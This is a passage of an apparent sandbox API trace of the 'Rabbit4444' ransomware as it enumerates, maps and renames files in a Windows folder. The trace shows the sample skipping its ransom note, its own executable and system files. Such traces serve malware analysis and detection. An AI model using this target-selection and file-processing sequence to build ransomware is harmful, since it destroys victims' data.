[0046.283] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.283] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.283] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0046.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.283] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe4e7332a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.283] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.283] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.283] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0046.283] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.284] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe4e7332a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe4e7332a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe4e99517, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.284] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.284] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.284] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b4fa7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b4fa7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="block.png", cAlternateFileName="")) returned 1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="Rabbit4444.exe") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2=".") returned 1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="..") returned 1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="windows") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="bootmgr") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="pagefile.sys") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="boot") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="ids.txt") returned -1 [0046.284] lstrcmpiW (lpString1="block.png", lpString2="NTUSER.DAT") returned -1 [0046.284] lstrcpyW (in: lpString1=0x130eb7a, lpString2="block.png" | out: lpString1="block.png") returned="block.png" [0046.284] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png", dwFileAttributes=0x0) returned 1 [0046.284] lstrlenW (lpString="block.png") returned 9 [0046.284] lstrlenW (lpString="Rabbit4444") returned 10 [0046.284] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0046.284] lstrlenW (lpString=".dll") returned 4 [0046.284] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.284] lstrlenW (lpString=".lnk") returned 4 [0046.285] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.285] lstrlenW (lpString=".ini") returned 4 [0046.285] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.285] lstrlenW (lpString=".sys") returned 4 [0046.285] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.285] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.285] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.285] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13759556175) returned 1 [0046.285] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=919) returned 1 [0046.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0046.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0046.285] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0046.286] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0046.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0046.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0046.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.288] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13759840983) returned 1 [0046.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0046.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0046.288] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.288] CloseHandle (hObject=0x298) returned 1 [0046.288] CloseHandle (hObject=0x278) returned 1 [0046.289] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\block.png.Rabbit4444") returned 53 [0046.289] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.290] InterlockedExchangeAdd (in: Addend=0xff618, Value=928 | out: Addend=0xff618) returned 4047824 [0046.290] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 2577 [0046.290] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b8a24, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b8a24, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x749e0600, ftLastWriteTime.dwHighDateTime=0x1d2ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x1ba8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bluelogo.png", cAlternateFileName="")) returned 1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="Rabbit4444.exe") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2=".") returned 1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="..") returned 1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="windows") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="bootmgr") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="pagefile.sys") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="boot") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="ids.txt") returned -1 [0046.291] lstrcmpiW (lpString1="bluelogo.png", lpString2="NTUSER.DAT") returned -1 [0046.291] lstrcpyW (in: lpString1=0x130eb7a, lpString2="bluelogo.png" | out: lpString1="bluelogo.png") returned="bluelogo.png" [0046.291] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png", dwFileAttributes=0x0) returned 1 [0046.292] lstrlenW (lpString="bluelogo.png") returned 12 [0046.292] lstrlenW (lpString="Rabbit4444") returned 10 [0046.292] lstrcmpiW (lpString1="uelogo.png", lpString2="Rabbit4444") returned 1 [0046.292] lstrlenW (lpString=".dll") returned 4 [0046.292] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.292] lstrlenW (lpString=".lnk") returned 4 [0046.292] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.292] lstrlenW (lpString=".ini") returned 4 [0046.292] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.292] lstrlenW (lpString=".sys") returned 4 [0046.292] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.292] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.292] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.292] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13760294503) returned 1 [0046.292] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7080) returned 1 [0046.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0046.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0046.292] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1eb0, lpName=0x0) returned 0x298 [0046.294] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1eb0) returned 0x70000 [0046.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.295] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0046.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0046.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.296] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13760644435) returned 1 [0046.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0046.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0046.296] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.296] CloseHandle (hObject=0x298) returned 1 [0046.296] CloseHandle (hObject=0x278) returned 1 [0046.297] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.Rabbit4444") returned 56 [0046.297] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.299] InterlockedExchangeAdd (in: Addend=0xff618, Value=7088 | out: Addend=0xff618) returned 4048752 [0046.299] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2579 [0046.299] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b9dbd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b9dbd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bullet.png", cAlternateFileName="")) returned 1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="Rabbit4444.exe") returned -1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2=".") returned 1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="..") returned 1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="windows") returned -1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="bootmgr") returned 1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="pagefile.sys") returned -1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="boot") returned 1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="ids.txt") returned -1 [0046.299] lstrcmpiW (lpString1="bullet.png", lpString2="NTUSER.DAT") returned -1 [0046.299] lstrcpyW (in: lpString1=0x130eb7a, lpString2="bullet.png" | out: lpString1="bullet.png") returned="bullet.png" [0046.299] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png", dwFileAttributes=0x0) returned 1 [0046.300] lstrlenW (lpString="bullet.png") returned 10 [0046.300] lstrlenW (lpString="Rabbit4444") returned 10 [0046.300] lstrcmpiW (lpString1="bullet.png", lpString2="Rabbit4444") returned -1 [0046.300] lstrlenW (lpString=".dll") returned 4 [0046.300] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.300] lstrlenW (lpString=".lnk") returned 4 [0046.300] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.300] lstrlenW (lpString=".ini") returned 4 [0046.300] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.300] lstrlenW (lpString=".sys") returned 4 [0046.300] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.300] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.300] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.300] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13761103244) returned 1 [0046.300] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=221) returned 1 [0046.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0046.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0046.300] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x298 [0046.302] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0x70000 [0046.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0046.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0046.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0046.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0046.304] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13761433085) returned 1 [0046.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0046.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0046.304] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.304] CloseHandle (hObject=0x298) returned 1 [0046.304] CloseHandle (hObject=0x278) returned 1 [0046.305] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\bullet.png.Rabbit4444") returned 54 [0046.305] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.306] InterlockedExchangeAdd (in: Addend=0xff618, Value=224 | out: Addend=0xff618) returned 4055840 [0046.306] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2582 [0046.306] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bb141, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bb141, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1687, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default.css", cAlternateFileName="")) returned 1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="Rabbit4444.exe") returned -1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2=".") returned 1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="..") returned 1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="windows") returned -1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="bootmgr") returned 1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="pagefile.sys") returned -1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="boot") returned 1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="ids.txt") returned -1 [0046.306] lstrcmpiW (lpString1="default.css", lpString2="NTUSER.DAT") returned -1 [0046.306] lstrcpyW (in: lpString1=0x130eb7a, lpString2="default.css" | out: lpString1="default.css") returned="default.css" [0046.306] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css", dwFileAttributes=0x0) returned 1 [0046.307] lstrlenW (lpString="default.css") returned 11 [0046.307] lstrlenW (lpString="Rabbit4444") returned 10 [0046.307] lstrcmpiW (lpString1="efault.css", lpString2="Rabbit4444") returned -1 [0046.307] lstrlenW (lpString=".dll") returned 4 [0046.307] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0046.307] lstrlenW (lpString=".lnk") returned 4 [0046.307] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0046.307] lstrlenW (lpString=".ini") returned 4 [0046.307] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0046.307] lstrlenW (lpString=".sys") returned 4 [0046.307] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0046.307] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.307] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.307] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13761807217) returned 1 [0046.307] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5767) returned 1 [0046.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0046.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0046.307] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1990, lpName=0x0) returned 0x298 [0046.309] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1990) returned 0x70000 [0046.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0046.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.311] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0046.311] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.311] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.311] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13762157625) returned 1 [0046.311] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0046.311] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0046.311] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.311] CloseHandle (hObject=0x298) returned 1 [0046.311] CloseHandle (hObject=0x278) returned 1 [0046.312] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default.css.Rabbit4444") returned 55 [0046.312] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css.rabbit4444"), dwFlags=0x1) returned 1 [0046.313] InterlockedExchangeAdd (in: Addend=0xff618, Value=5776 | out: Addend=0xff618) returned 4056064 [0046.313] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2585 [0046.313] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bc4cd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bc4cd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xf44d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default.htm", cAlternateFileName="")) returned 1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="Rabbit4444.exe") returned -1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2=".") returned 1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="..") returned 1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="windows") returned -1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="bootmgr") returned 1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="pagefile.sys") returned -1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="boot") returned 1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="ids.txt") returned -1 [0046.313] lstrcmpiW (lpString1="default.htm", lpString2="NTUSER.DAT") returned -1 [0046.313] lstrcpyW (in: lpString1=0x130eb7a, lpString2="default.htm" | out: lpString1="default.htm") returned="default.htm" [0046.313] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm", dwFileAttributes=0x0) returned 1 [0046.316] lstrlenW (lpString="default.htm") returned 11 [0046.316] lstrlenW (lpString="Rabbit4444") returned 10 [0046.316] lstrcmpiW (lpString1="efault.htm", lpString2="Rabbit4444") returned -1 [0046.316] lstrlenW (lpString=".dll") returned 4 [0046.316] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0046.316] lstrlenW (lpString=".lnk") returned 4 [0046.316] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0046.316] lstrlenW (lpString=".ini") returned 4 [0046.316] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0046.316] lstrlenW (lpString=".sys") returned 4 [0046.316] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0046.316] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 